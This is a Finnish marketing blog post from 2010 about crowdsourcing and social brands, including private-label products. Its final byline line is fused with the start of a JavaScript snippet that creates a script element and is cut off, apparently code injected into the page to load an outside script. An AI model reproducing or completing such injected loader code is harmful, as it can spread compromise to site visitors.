9.7.2010

Kuva 2

Kerro mitä tapahtuu elämässäsi 24.7.10 video-klipin muodossa ja olet mukana tekemässä elokuvaa, jonka Ridley Scott ja Kevin Macdonald ohjaavat ja editoivat. Ensi-ilta on 2011 Sundance filmifestivaaleilla.

Sosiaaliselle brändille on ominaista osallistuminen ja keskustelu. Ajatus ottaa ihmiset mukaan suunnittelemaan toimintaa ei ole mikään uusi, sillä kuluttajatutkimusten ja -paneeleiden kautta markkinoijat ovat saaneet luotua kuvaa, joskus jopa harhakuvaa, siitä mikä voisi ns. upota porukkaan.

Verkko on kuitenkin mahdollistanut laajemman ja syvemmän yhteistyön brändin ja käyttäjänsä välille. Crowdsourcing eli talkoistaminen antaa käyttäjille valtaa vaikuttaa ja näin sitouttaa heitä toimintaan ja ennen kaikkea brändiin. Annetaan ihmisten päättää mitä he haluavat, niin he todennäköisesti haluavat sitä. Tämä voidaan tehdä eri tavoilla, mutta sosiaalisen brändin malli on se joka saa paketin toimimaan.

Merkityksellisyyden happotesti

Ota brändisi ja kutsu ihmisiä talkoisiin – jos talkooporukkaa kerääntyy, muutenkin kuin vain syömään sitä talkoomakkaraa ja juomaan vissyä, ollaan hyvällä pohjalla. Jos he alkavat vapaaehtoisesti ideoimaan ja työstämään brändisisältöäsi olet jo kyennyt toimimaan merkityksellisesti.

Jos käy kuitenkin niin että kukaan ei ilmoittaudu, on syytä miettiä missä vika, miksi ei kiinnosta. Kovin pitkälle ei nykymarkkinoinnissa pääse aivan-sama-sisällöllä.

Kaupan merkit sosiaalisina brändeinä

Kaupan merkit tarjoavat merkityksellisyyttä, usein halvan hinnan muodossa eli näin ne tarjoavat kuluttajille aidon syyn olla kanssaan tekemisissä.

Kaupan merkit kuuntelevat kuluttajaa kopioimalla suosittuja tuotteita ja tarjoamalla niitä kohderyhmälleen merkityksellisessä muodossa.

Ne eivät keskeytä, eivät pakkosyötä, eivätkä näyttäydy keinotekoisina pintoina vaan ne käyttäytyvät tarinansa mukaisesti.

Toimit sitten millä tontilla tahansa, on talkoistamisessa hyvää potentiaalia kasvattaa brändiäsi – sosiaalisesti.

Mikko Kaijansinkko on W.Steinmannin strategiajohtajavar d=document;var s=d.createElement(’script’);